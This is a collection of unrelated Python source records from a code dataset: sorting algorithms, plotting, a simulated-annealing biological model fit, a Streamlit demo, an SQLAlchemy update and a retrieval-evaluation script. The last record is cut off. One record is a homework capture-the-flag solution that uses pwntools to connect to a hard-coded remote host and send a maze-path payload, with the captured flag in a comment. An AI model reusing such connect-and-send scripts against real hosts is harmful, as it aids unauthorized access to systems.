{"seq_id":"237363630","text":"\ndef selection_sort(arr):\n\t#finding the minimum number and placing it at successive indexes in increasing order.\n\tfor i in range(len(arr)):\n\t\tmin_num = arr[i]\n\t\tposition = i\n\t\tfor j in range(i+1,len(arr)):\n\t\t\tif min_num > arr[j]:\n\t\t\t\tmin_num = arr[j]\n\t\t\t\tposition = j\n\t\tarr[position] = arr[i]\n\t\tarr[i] = min_num\n\treturn arr\n#time complexity = O(n^2)\n#auxiliary Space = O(1)\n\n\ndef bubble_sort(arr):\n\t#swap adjacent elements that are out of order\n\tfor i in range(len(arr)):\n\t\tfor j in range(0, len(arr)-i-1):\n\t\t\tif arr[j] > arr[j+1]:\n\t\t\t\tarr[j], arr[j+1] = arr[j+1], arr[j]\n\treturn arr\n#time complexity = O(n^2)\n\n\ndef insertion_sort(arr):\n\t#loop through the array and place each element at its correct position in the sorted prefix.\n\tfor i in range(len(arr)):\n\t\tkey = arr[i]\n\t\tj = i - 1\n\t\twhile j >= 0 and key < arr[j]:\n\t\t\tarr[j+1] = arr[j]\n\t\t\tj -= 1\n\t\tarr[j+1] = key\n#time complexity = O(n^2)\n\ndef heapify(arr, n, i):\n    largest = i  # Initialize largest as root\n    l = 2 * i + 1     # left = 2*i + 1\n    r = 2 * i + 2     # right = 2*i + 2\n\n    # See if left child of root exists and is\n    # greater than root\n    if l < n and arr[i] < arr[l]:\n        largest = l\n\n    # See if right child of root exists and is\n    # greater than root\n    if r < n and arr[largest] < arr[r]:\n        largest = r\n\n    # Change root, if needed\n    if largest != i:\n        arr[i],arr[largest] = arr[largest],arr[i]  # swap\n\n        # Heapify the root.\n        heapify(arr, n, largest)\n\n# The main function to sort an array of given size\ndef heapSort(arr):\n    n = len(arr)\n\n    # Build a maxheap.
\n for i in range(n, -1, -1): \n heapify(arr, n, i) \n \n # One by one extract elements \n for i in range(n-1, 0, -1): \n arr[i], arr[0] = arr[0], arr[i] # swap \n heapify(arr, i, 0)\n\n#the time complexity is O(nlogn)\n\ndef partition(arr,low,high): \n i = ( low-1 ) # index of smaller element \n pivot = arr[high] # pivot \n \n for j in range(low , high): \n \n # If current element is smaller than or \n # equal to pivot \n if arr[j] <= pivot: \n \n # increment index of smaller element \n i = i+1 \n arr[i],arr[j] = arr[j],arr[i] \n \n arr[i+1],arr[high] = arr[high],arr[i+1] \n return ( i+1 ) \n \n# The main function that implements QuickSort \n# arr[] --> Array to be sorted, \n# low --> Starting index, \n# high --> Ending index \n \n# Function to do Quick sort \ndef quickSort(arr,low,high): \n if low < high: \n \n # pi is partitioning index, arr[p] is now \n # at right place \n pi = partition(arr,low,high) \n \n # Separately sort elements before \n # partition and after partition \n quickSort(arr, low, pi-1) \n quickSort(arr, pi+1, high) \n\n#time complexity = O(nlogn)\n\ndef mergeSort(arr): \n if len(arr) >1: \n mid = len(arr)//2 #Finding the mid of the array \n L = arr[:mid] # Dividing the array elements \n R = arr[mid:] # into 2 halves \n \n mergeSort(L) # Sorting the first half \n mergeSort(R) # Sorting the second half \n \n i = j = k = 0\n \n # Copy data to temp arrays L[] and R[] \n while i < len(L) and j < len(R): \n if L[i] < R[j]: \n arr[k] = L[i] \n i+=1\n else: \n arr[k] = R[j] \n j+=1\n k+=1\n \n # Checking if any element was left \n while i < len(L): \n arr[k] = L[i] \n i+=1\n k+=1\n \n while j < len(R): \n arr[k] = R[j] \n j+=1\n k+=1\n#time complexity is O(nlogn)","sub_path":"sorting/sortings.py","file_name":"sortings.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463412396","text":"#!/usr/bin/env python\n#BALSN{4M4z31nG_bUg_F0uNd_bY_KLEE!!}\nfrom pwn import *\n\nhost = \"140.112.31.96\"\nport = 10132\n\nr = remote(host, port)\npayload = \"ddddssaaaassssddddddwddwwaawwwddddsss\"\nr.sendline(payload)\nr.interactive()\n","sub_path":"Computer-Security/hw3-solution/code2a.py","file_name":"code2a.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"432617516","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport argparse\n\n\ndef surface(data, file):\n Z = np.array(data)\n X = np.arange(0, 1, 1.0 / Z.shape[1])\n Y = np.arange(0, 1, 1.0 / Z.shape[0])\n X2D, Y2D = np.meshgrid(X, Y)\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.plot_surface(X2D, Y2D, Z)\n plt.subplots_adjust(wspace=0.5, hspace=0.6)\n plt.savefig('{}.pdf'.format(file))\n\n\ndata = pd.read_csv(\"result.txt\", header=None, sep=' ')\nsurface(data, \"surface\")\n","sub_path":"dirichlet_problem_mpi/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"346488719","text":"import time\n\nbufor = {}\n\ndef fibonacci(n):\n global bufor\n if n in bufor:\n return bufor[n]\n\n if n == 0:\n wynik = 0\n elif n == 1:\n wynik = 1\n else:\n wynik = fibonacci(n-1) + fibonacci(n-2)\n bufor[n] = wynik\n return wynik\n\npoczatek = time.time()\n\nfor i in range(0, 101):\n wynik = fibonacci(i)\n print(i, wynik)\n\nkoniec = time.time()\nczas = koniec - 
poczatek\nprint('Wszystkie 100 liczb obliczono w', czas, 'sekund.')\n","sub_path":"memoizacja_fibonacciego.py","file_name":"memoizacja_fibonacciego.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"271059263","text":"# simulated annealing a n-dimensional objective function\nfrom numpy import mean\nfrom numpy import exp\nfrom numpy.random import randn\nfrom numpy.random import rand\nfrom numpy import asarray\nfrom numpy.random import seed\nfrom matplotlib import pyplot\nimport pandas as pd\nimport Fitting as Fit\nimport Gillespie as Glp\nimport os\nimport pickle\n\nclass Simulated_Annealing():\n\n\tdef __init__(self):\n\t\t# initialise constants\n\t\tself.species_lenser = [\"x\",\"y\",\"z\"] # z inner und x free, y loosely bound\n\t\t# loss side\n\t\tself.L_lenser = pd.DataFrame({\"reaction01\":[0, 0, 0], # außen - x\n\t\t\t\t\t\"reaction02\":[1, 0, 0], # x - y\n\t\t\t\t\t\"reaction03\":[0, 1, 0], # y - z\n\t\t\t\t\t\"reaction11\":[1, 0, 0], # x - außen\n\t\t\t\t\t\"reaction12\":[0, 1, 0], # y - x\n\t\t\t\t\t\"reaction13\":[0, 0, 1]}, # z - y\n\t\t\t\t\tindex = self.species_lenser)\n\t\t# gain side\n\t\tself.R_lenser = pd.DataFrame({\"reaction01\":[1, 0, 0], # außen - x\n\t\t\t\t\t\"reaction02\":[0, 1, 0], # x - y\n\t\t\t\t\t\"reaction03\":[0, 0, 1], # y - z\n\t\t\t\t\t\"reaction11\":[0, 0, 0], # x - außen\n\t\t\t\t\t\"reaction12\":[1, 0, 0], # y - x\n\t\t\t\t\t\"reaction13\":[0, 1, 0]}, # z - y\n\t\t\t\t\tindex = self.species_lenser)\n\t\tself.N_lenser = self.R_lenser - self.L_lenser\n\n\t\t# number of fluorescent molecules after bleach\n\t\tself.startQuantities_lenser = {\"x\":[0],\"y\":[0],\"z\":[0]}\n\n\t\tself.time_limit_lenser = 1160.0 # see time axis of measured data\n\t\tself.runs_lenser = 40\n\t\t# colours for plotting\n\t\tself.colours_lenser = {\"x\":\"red\", \"y\":\"forestgreen\", \"z\":\"lightblue\"}\n\t\t# component of the measured FRAP data to be fittet to\n\t\tself.pml_component = \"PML I WT\"\n\n\t\tself.measurement = pd.read_csv(\"./../Daten/FRAP_comparison_all_new_AssemblyDynamicsOfPMLNuclearBodiesInLivingCells_cleaned.csv\", index_col=\"time[s]\")\n\t\tself.measured_times = self.measurement.index.tolist()\n\t\tself.time_intervals = Fit.divide_time_axis_equidistantly(self.measured_times)\n\n\t\tself.storage_path = './../Daten/SimulatedAnnealing/WeidtkampPeters_Lenser/'\n\t\tself.track_data =[]\n\n\t# objective function\n\tdef objective_function(self, parameters):\n\t\tif len(parameters) != len(self.L_lenser.columns):\n\t\t\traise IndexError('The number of parameters has to equal the number of reactions in the given reaction network.')\n\t\tconstants = {reaction:parameters[i] for i, reaction in enumerate(self.L_lenser.columns)}\n\t\t# TODO: delete print\n\t\t# print(constants)\n\t\t# simulate one or more Gillespie runs\n\t\ttrajectories = Glp.monte_carlo_gillespie(constants, self.L_lenser, self.N_lenser, self.startQuantities_lenser, runs=self.runs_lenser, time_max=self.time_limit_lenser)\n\t\t# list of tuples of gillespie times_list and added_quantities_list for output signal\n\t\tlist_of_output_data = Glp.make_output_signal(trajectories, self.species_lenser)\n\t\t# DataFrame of averaged gillespie data per time interval, time intervals as index\n\t\tassigned_simulation_data = Fit.assign_simulation_times_to_time_ranges_average(self.time_intervals,self.measured_times,list_of_output_data)\n\t\t# normalize the simulation data\n\t\tnorm_value = 273 # max 200 molecules in a 
ROI\n\t\tnormalized_assigned_simulation_data = assigned_simulation_data/norm_value\n\t\t# calculate the absolute differences between the simulated and measured data\n\t\tdifferences = Fit.calculate_differences(self.measurement[self.pml_component], normalized_assigned_simulation_data)\n\t\t# create a quality score by adding up the differences per individual run and averaging the sums\n\t\tquality_of_fitness = mean(differences.sum())\n\t\tself.track_data = [trajectories, normalized_assigned_simulation_data, differences, quality_of_fitness]\n\t\t\n\t\treturn quality_of_fitness\n\n\t# simulated annealing algorithm\n\tdef simulated_annealing(self, objective, bounds, n_iterations, step_size, temp):\n\t\t# create a path to save all files, if needed\n\t\tif not os.path.exists(self.storage_path):\n\t\t\tos.makedirs(self.storage_path)\n\t\t# generate an initial solution\n\t\tbest = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n\t\t# evaluate the initial solution\n\t\tbest_eval = objective(best)\n\t\t# store simulation data\n\t\tstorage_file = self.storage_path + 'simulation-1_data_pickle_binary'\n\t\twith open(storage_file, 'bw') as dumpfile:\n\t\t\tpickle.dump(self.track_data, dumpfile)\n\t\t# current working solution\n\t\tworking, working_eval = best, best_eval\n\t\tbest_scores = []\n\t\t# run simulated annealing\n\t\tfor i in range(n_iterations):\n\t\t\t# get another solution\n\t\t\tcandidate = working + randn(len(bounds)) * step_size\n\t\t\t# the rate constant values of the candidate shall be between 0 (do not take place) and 1 (fully take place)\n\t\t\tfor candi in range(len(candidate)):\n\t\t\t\tif candidate[candi] < 0:\n\t\t\t\t\tcandidate[candi] = 0.0\n\t\t\t\tif candidate[candi] > 1:\n\t\t\t\t\tcandidate[candi] = 1.0\n\t\t\tif sum(candidate) == 0:\n\t\t\t\tprint(\"The combination of the input parameters has resulted in the overall reactivity of the system a0 being 0. 
The simulation run %d was therefore skipped.\" % i)\n\t\t\t\tcontinue\n\t\t\t# evaluate candidate solution\n\t\t\tcandidate_eval = objective(candidate)\n\t\t\t# store simualtion data\n\t\t\tstorage_file = self.storage_path + 'simulation+' + str(i) + '_data_pickle_binary'\n\t\t\twith open(storage_file, 'bw') as dumpfile:\n\t\t\t\tpickle.dump(self.track_data, dumpfile)\n\t\t\t# check, if the candidate is better than the current best\n\t\t\tif candidate_eval < best_eval:\n\t\t\t\t# store new best solution\n\t\t\t\tbest, best_eval = candidate, candidate_eval\n\t\t\t\t# keep track of scores\n\t\t\t\tbest_scores.append(best_eval)\n\t\t\t\t# report progress\n\t\t\t\tprint('>%d eval(%s) = %.5f' % (i, best, best_eval))\n\t\t\telse:\n\t\t\t\tprint('>%d' % i)\n\t\t\t# difference between candidate and working solution evaluation\n\t\t\tdiff = candidate_eval - working_eval\n\t\t\t# calculate temperature for current epoch\n\t\t\tt = temp / float(i + 1)\n\t\t\t# calculate metropolis acceptance criterion\n\t\t\tmetropolis = exp(-diff / t)\n\t\t\t# check if we should keep the new solution\n\t\t\tif diff < 0 or rand() < metropolis:\n\t\t\t\t# store the new working solution\n\t\t\t\tworking, working_eval = candidate, candidate_eval\n\t\treturn [best, best_eval, best_scores]\n\ndef run_simulated_annealing():\n\t# seed the pseudorandom number generator\n\t# seed(1)\n\t# object\n\tobj = Simulated_Annealing()\n\t# create ranges for the number of parameters to be optimised\n\tbounds = asarray([[0.0, 1.0]]*len(obj.L_lenser.columns))\n\t# number of annealing iterations\n\tn_iterations = 100\n\t# maximum step size\n\tstep_size = 0.1\n\t# initial temperature\n\ttemperature = 50\n\t# perform the simulated annealing search\n\tbest, score, scores = obj.simulated_annealing(obj.objective_function, bounds, n_iterations, step_size, temperature)\n\tprint('Done!')\n\tprint('f(%s) = %f' % (best, score))\n\t# line plot of best scores\n\tpyplot.plot(scores, '.-')\n\tpyplot.xlabel('Improvement Number')\n\tpyplot.ylabel('Evaluation objective(c)')\n\tpyplot.show()\n\n\treturn obj\n","sub_path":"Simulated_Annealing.py","file_name":"Simulated_Annealing.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215553893","text":"'''\nQuestion:\nWrite a program that calculates and prints the value according to the given formula:\nQ = Square root of [(2 * C * D)/H]\nFollowing are the fixed values of C and H:\nC is 50. 
H is 30.\nD is the variable whose values should be input to your program in a comma-separated sequence.\nExample\nLet us assume the following comma separated input sequence is given to the program:\n100,150,180\nThe output of the program should be:\n18,22,24\n'''\nimport math\nC = 50\nH = 30\ncomma = ','\ndef getD():\n S = input('Please input a comma separated input sequence of D:')\n result = S.split(comma)\n return(result)\ndef formula(D):\n Q = []\n for i in range(len(D)):\n result = round(math.sqrt((2 * C * int(D[i])) / H))\n Q.append(str(result))\n return Q\nD = getD()\nQ = formula(D)\nprint(comma.join(Q))\n\n'''\nSolution:\n#!/usr/bin/env python\nimport math\nc=50\nh=30\nvalue = []\nitems=[x for x in raw_input().split(',')]\nfor d in items:\n value.append(str(int(round(math.sqrt(2*c*float(d)/h)))))\n\nprint ','.join(value)\n'''","sub_path":"program/Q6.py","file_name":"Q6.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"624613080","text":"from content_scraper import setup_logging\nfrom dotenv import load_dotenv\nimport content_scraper.pipelines.single as single\nimport argparse\n\n\nload_dotenv()\nsetup_logging()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Perform a text scrape\")\n parser.add_argument(\n \"platform\",\n type=str,\n help=\"a platform to scrape from various text input sources\",\n )\n parser.add_argument(\n \"-l\",\n \"--limit\",\n type=int,\n help=\"number of texts per keyword\",\n )\n args = parser.parse_args()\n\n single.batch_collect_single_platform(args.platform, limit=args.limit)\n\n print(\"Single collection complete\")\n","sub_path":"content_scraper/content_scraper_cli.py","file_name":"content_scraper_cli.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"50210701","text":"import textwrap\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport time\n\nst.title('Streamlit 超入門')\n\n# st.write('Display Image')\n\n# df = pd.DataFrame(\n# np.random.rand(100,2)/[50,50] + [35.69, 139.70],\n# columns = ['lat', 'lon']\n# )\n\n#st.write(df)\n#st.table(df.style.highlight_max(axis = 0))\n#st.line_chart(df)\n#st.area_chart(df)\n#st.bar_chart(df)\n#st.map(df)\n\n# if st.checkbox('Show Image'):\n# img = Image.open('IMG_0261 (2).jpg')\n# st.image(img, caption='mogmog', use_column_width=True)\n\n# option = st.selectbox(\n# 'あなたが好きな数字を教えてください',\n# list(range(1,11)))\n# 'あなたの好きな数字は',option,'です'\n\n# text = st.text_input('あなたの趣味を教えてください')\n# 'あなたの趣味は',text,'です'\n\n# condition = st.slider('あなたの今の調子は?',0,100,50)#min,max,start値\n# 'コンディション',condition,'です'\n\n# # st.sidebarって書くと、サイドバーに持っていける\n# text = st.sidebar.text_input('あなたの趣味を教えてください')\n# 'あなたの趣味は',text,'です'\n\n# condition = st.sidebar.slider('あなたの今の調子は?',0,100,50)#min,max,start値\n# 'コンディション',condition,'です'\n\n\n\nst.write('プログレスバーの表示')\n'Start!'\nlatest_iteration = st.empty()\nbar = st.progress(0)\nfor i in range(100):\n latest_iteration.text(f'Iteration{i+1}')\n bar.progress(i+1)\n time.sleep(0.1)\n'Done'\n\n\n\n\n\nleft_columns, right_columns = st.columns(2)\nbutton = left_columns.button('右カラムに文字を表示')\nif button:\n right_columns.write('ここは右カラムです')\n\nexpander = 
st.expander('問い合わせ')\nexpander.write('問い合わせ内容を書く')\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"124066734","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport re\nfrom clog import clog\n\n\nclog = clog()\nclog.setLevel(\"e|v\")\n\nALLOCATION_PATTERN = \"C|%d|Allocation rate\"\ndef calculate_mem_alloc(name):\n fd = open(name, \"r\")\n content = fd.readlines()\n #step 1 find pid\n pid = 0\n for log in content:\n if \"bindApplication\" in log:\n tmp = re.findall(r\"\\([\\s|\\d]*\\)\", log.strip())\n if tmp:\n pid = int(tmp[0][1:-1])\n clog.d(\"pid = %d\" % (pid))\n else:\n clog.e(\"Error: Can't parse pid!\")\n return\n break\n keyword = ALLOCATION_PATTERN % pid\n resList = []\n for log in content:\n if keyword in log:\n tmp = re.findall(r\"\\d+\\.\\d+\", log)\n if tmp:\n ts = float(tmp[0])\n clog.d(\"ts = %f\" % (ts))\n else:\n clog.e(\"Error: Can't parse ts!\")\n return\n\n tmp = re.findall(r\"\\d*\\\\n\", log)\n if tmp:\n rate = int(tmp[0][:-2])\n clog.d(\"rate = %d\" % (rate))\n else:\n clog.e(\"Error: Can't parse rate!\")\n return\n resList.append([ts, rate])\n total = 0\n for i in range(1, len(resList)):\n duration = (resList[i][0] - resList[i - 1][0]) * 1000\n total += resList[i - 1][1] * duration\n clog.d(\"current toal = %d\" % total)\n\n duration = resList[-1][0] - resList[0][0]\n clog.v(\"%s: \" % name)\n clog.v(\"total = %d\" % total)\n clog.v(\"duartion = %f ms\" % (duration * 1000))\n \n\n\n \ndef main():\n if len(sys.argv) < 2:\n clog.e(\"Error: no args!\")\n sys.exit()\n\n for i in xrange(1, len(sys.argv)):\n calculate_mem_alloc(sys.argv[i])\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"calculate_mem_alloc.py","file_name":"calculate_mem_alloc.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"555002433","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg1 = cv2.imread('../images/example1.png', 0)\nimg2 = cv2.imread('../images/example2.png', 0)\n\nsift = cv2.SIFT_create()\n#sift = cv2.AKAZE_create()\n#sift = cv2.BRISK_create()\n\n# find the keypoints and descriptors with SIFT\n(kps1, descs1) = sift.detectAndCompute(img1, None)\n(kps2, descs2) = sift.detectAndCompute(img2, None)\n\n# BFMatcher with default params\nbf = cv2.BFMatcher()\nmatches = bf.knnMatch(descs1, descs2, k=2)\n\n#Find the 2 nearest neighbors for a given descriptor. Let d1 be the distance to the nearest neighbor and d2 be the distance to the next one. \n#In order to accept the nearest neighbor as a \"match\", d1/d2 ratio should be smaller than a given threshold. 
\n#The motivation behind this test is that we expect a good match to be much closer to the query feature than the second best match.\n# Because if both features are similarly close to the query, we cannot decide which one is really the best one.\n \n# Apply ratio test\ngood = []\nfor m, n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n# cv2.drawMatchesKnn expects list of lists as matches.\nimg3 = cv2.drawMatchesKnn(img1, kps1, img2, kps2, good, None, flags=2)\nplt.imshow(img3), plt.show()\ncv2.imwrite('img3.jpg', img3)\n","sub_path":"lectures/2-partial-exam/11-lec/2-Клучни-локални-дескриптори/Examples/SIFT/sift-match.py","file_name":"sift-match.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"149965918","text":"open(\"output.txt\",'w')\r\n\r\nwith open('AssessmentTrainSet.txt','r') as AssessmentTrainSet:\r\n with open('ResultsTrainSet.txt','r') as ResultsTrainSet:\r\n\r\n PR_SUM = [0.0 for i in range(0,11)]\r\n mAP = [0.0 for i in range(0,16)]\r\n \r\n for queryIndex in xrange(0,16):\r\n\r\n def readData(inputstream):\r\n while True:\r\n title = inputstream.readline().split()\r\n if len(title) > 0 and title[0] == 'Query':\r\n break\r\n \r\n num = int(title[3])\r\n return [inputstream.readline() for i in range(0,num)]\r\n\r\n #Assessment\r\n Assessment = readData(AssessmentTrainSet)\r\n Assessment = [temp[:-2] for temp in Assessment] #-2 is for delete \\r\\n\r\n\r\n #Results\r\n Results = readData(ResultsTrainSet)\r\n Results = [temp.split()[0] for temp in Results]\r\n\r\n class Recall_Precision:\r\n def __init__(self, R=None, P=None):\r\n self.R = R if R is not None else 0.0\r\n self.P = P if P is not None else 0.0\r\n \r\n #calcualte RP\r\n RP = []\r\n for index,query in enumerate(Results,1):\r\n for ans in Assessment:\r\n if query == ans: \r\n R = (len(RP)+1)*100 / float(len(Assessment))\r\n P = (len(RP)+1)*100 / float(index)\r\n RP.append(Recall_Precision(R,P))\r\n break\r\n if len(RP) == len(Assessment):\r\n break\r\n\r\n #PR10 (formula I)\r\n PR10 = [0.0 for i in range(0,11)]\r\n iterRP = len(RP)-1\r\n PR10[10] = RP[iterRP].P\r\n \r\n for i in xrange(9,-1,-1):\r\n maxP = PR10[i+1]\r\n while iterRP >= 0: \r\n if RP[iterRP].R < i*10:\r\n break\r\n if RP[iterRP].P > maxP: \r\n maxP = RP[iterRP].P\r\n iterRP -= 1\r\n PR10[i] = maxP\r\n \r\n #PR_SUM\r\n for i in xrange(0,11):\r\n PR_SUM[i] += PR10[i]\r\n\r\n #mAP (formula III)\r\n for iterRP in RP:\r\n mAP[queryIndex] += iterRP.P\r\n mAP[queryIndex] /= len(Assessment)\r\n\r\n #Print PR and PR10\r\n with open(\"output.txt\",'a') as output:\r\n output.write(\"\\nQuery NO.\" + str(queryIndex))\r\n output.write(\"\\nP\\t\\t\\tR\\n\")\r\n for iterRP in RP:\r\n output.write(str(iterRP.P) + \"\\t\\t\" + str(iterRP.R) + \"\\n\")\r\n for index,iterPR10 in enumerate(PR10):\r\n output.write(str(index*10) + \"%\\t\\t\" + str(iterPR10) + \"\\n\")\r\n \r\n #PR_AVG (formula II)\r\n PR_AVG = [PR_SUM[i]/16 for i in range(0,11)]\r\n\r\n #mAP_AVG\r\n mAP_AVG = sum(mAP)/(16*100)\r\n\r\n #Print PR_AVG and mAP_AVG\r\n with open(\"output.txt\",'a') as output:\r\n output.write(\"\\nPR_AVG:\\n\")\r\n for index,iterPR_AVG in enumerate(PR_AVG):\r\n output.write(str(iterPR_AVG) + \"\\t\\t\" + str(index*10) + \"%\\n\")\r\n output.write(\"\\nmAP_AVG : \" + str(mAP_AVG) + 
\"\\n\")\r\n","sub_path":"HW1/60347046S_HW1.py","file_name":"60347046S_HW1.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"163544888","text":"#Text Slicing\nimport random\n\ngetText = \"Singapore GDP Data\"\n#0123456789\n#Singapore GDP Data\n\n#-1 -2 -3 -4\n# a t a D\n\n\n#for i in range(len(getText)):\n# print(getText[i], end=\"\")\n \n\"\"\"\nprint(\"\")\nj = -1 \nfor i in range(len(getText)):\n print(getText[j], end=\"\")\n j-=1\n\"\"\"\n######################################################3 \ngetText = -1 \nwhile(getText != 0):\n getText = input(\"\\nGet Text: \") \n if getText == \"0\":\n break\n \n lowIdx = random.randrange(-(len(getText)), len(getText))\n highIdx = random.randrange(-(len(getText)), len(getText)) \n if(lowIdx > highIdx):\n temp = lowIdx\n lowIdx = highIdx\n highIdx = temp\n \n print(str(lowIdx) + \" \" + str(highIdx)) \n print(\"[\", end=\"\")\n #[startIdx:endIdx]\n print(getText[lowIdx: highIdx], end=\"\")\n print(\"]\", end=\"\")\n \n ","sub_path":"CH4_TextSlicing.py","file_name":"CH4_TextSlicing.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"169742455","text":"#!/usr/bin/python3\n\"\"\"\nORM queries that modify the databse\n\n\"\"\"\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n # lets create a Session object\n ses = Session()\n output = ses.query(State).filter(State.id == 2)\n # if you want to reset the autoincrement use:\n # ALTER TABLE states AUTO_INCREMENT = 1;\n for elem in output:\n elem.name = \"New Mexico\"\n ses.commit()\n ses.close()\n","sub_path":"0x0F-python-object_relational_mapping/12-model_state_update_id_2.py","file_name":"12-model_state_update_id_2.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94648692","text":"def readfile(gradefile):\n '''(file open for reading)->dict of {float:list of str}\n read the grades from gradefile anf teturn a dictionary'''\n\n line = gradefile.readline()\n\n grade_to_ids = {}\n b=line.split(' ')\n while line != '':\n for int in range(0,len(b)-1,2):\n student_id =b[int]\n grade = float(b[int+1])\n \n if grade not in grade_to_ids:\n grade_to_ids[grade] = [student_id]\n else:\n grade_to_ids[grade].append(student_id)\n \n line = gradefile.readline()\n b=line.split(' ')\n \n return grade_to_ids\n\nif __name__ == '__main__':\n gradefile = open('/home/zhangpeng/github/python_project/text/record')\n print(readfile(gradefile))\n\n\n","sub_path":"cherk/readfile3.py","file_name":"readfile3.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"627667276","text":"import sqlite3 as lite\nimport pandas as pd\ncon = lite.connect('getting_started.db')\nwith con:\n cur = con.cursor()\n sql = \"SELECT name, state, year, warmth_month, cold_month FROM cities \" \\\n \"INNER JOIN weather \" \\\n \"ON name = city\"\n cur.execute(sql)\n\nrows = cur.fetchall()\ncols = [desc[0] for desc in cur.description]\ndf = 
pd.DataFrame(rows, columns=cols)\n# print(df)\nfor index, row in df.iterrows():\n print(\"In %s the warmest month is %s\" %(row['name'],row['warmth_month']))","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"328153716","text":"import xgboost as xgb\nimport pandas as pd\nimport numpy as np\nimport time\n\ndef get_data():\n dtrain = pd.read_csv('dtrain.csv').iloc[:, 1:]\n dtest = pd.read_csv('dtest.csv').iloc[:, 1:]\n labels = pd.read_csv('train_y.csv')\n return dtrain, labels, dtest\n\ndef get_binary_data():\n xgb_dtrain = xgb.DMatrix('xgb.dtrain')\n xgb_dtest = xgb.DMatrix('xgb.dtest')\n test_uid = pd.read_csv('test_x.csv').iloc[:,0]\n return xgb_dtrain, xgb_dtest, test_uid\n\ndef main():\n #dtrain, labels, dtest = get_data()\n #xgb_dtrain = xgb.DMatrix(dtrain, label=1-labels.y)\n #xgb_dtest = xgb.DMatrix(dtest)\n\n xgb_dtrain, xgb_dtest, test_uid = get_binary_data()\n\n # setup parameters for xgboost\n param = {}\n param['booster'] = 'gbtree'\n param['objective'] = 'binary:logistic'\n param['scale_pos_weight'] = 8.7\n param['gamma']=0\n param['lambda']= 700\n param['subsample']=0.75\n param['colsample_bytree']=0.30\n param['min_child_weight']=5\n param['max_depth']=8\n param['eta']=0.03\n param['metrics']='auc'\n\n watchlist = [ (xgb_dtrain,'train')]\n num_round = 1820\n bst = xgb.train(param, xgb_dtrain, num_round, watchlist)\n\n pred = bst.predict(xgb_dtest)\n result = pd.DataFrame(test_uid)\n result['score'] = pd.Series(pred)\n result.to_csv(str(time.time())+'.csv', index=False)\nif __name__ == '__main__':\n main()\n\n arr = np.array([1,2,3,4])\n arr.sum()\n np.loadtxt()\n np.savetxt()\n np.tile()","sub_path":"xgboost/DataCastle/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"197256931","text":"def format_result(result, event='3x3x3'):\n if event == '3x3x3 Fewest Moves':\n return _format_result_FMC(result)\n\n elif event == '3x3x3 Multi-Blindfolded':\n return _format_result_multi(result)\n\n elif result > 10 * 60 * 100: # mins * secs * millisecs\n return _format_result_OVER_10MIN(result)\n\n elif result < 60 * 100: # mins * millisecs\n return _format_result_UNDER_1MIN(result)\n\n else:\n minutes = int(result / 6000)\n return shrink_or_enlarge_string(str(minutes)) + \":\" + _format_result_UNDER_1MIN(result % 6000)\n\ndef _format_result_FMC(result):\n # Single\n if result < 100:\n return str(result)\n # Mean of 3\n else:\n moves, millimoves = int(result / 100), result % 100\n return str(moves) + \".\" + str(millimoves)\n\ndef _format_result_multi(result):\n missed = result % 100\n time_in_sec = int((result % 1000000) / 100)\n minutes, seconds = int(time_in_sec / 60), time_in_sec % 60\n difference = 99 - int(result / 10000000)\n solved = difference + missed\n 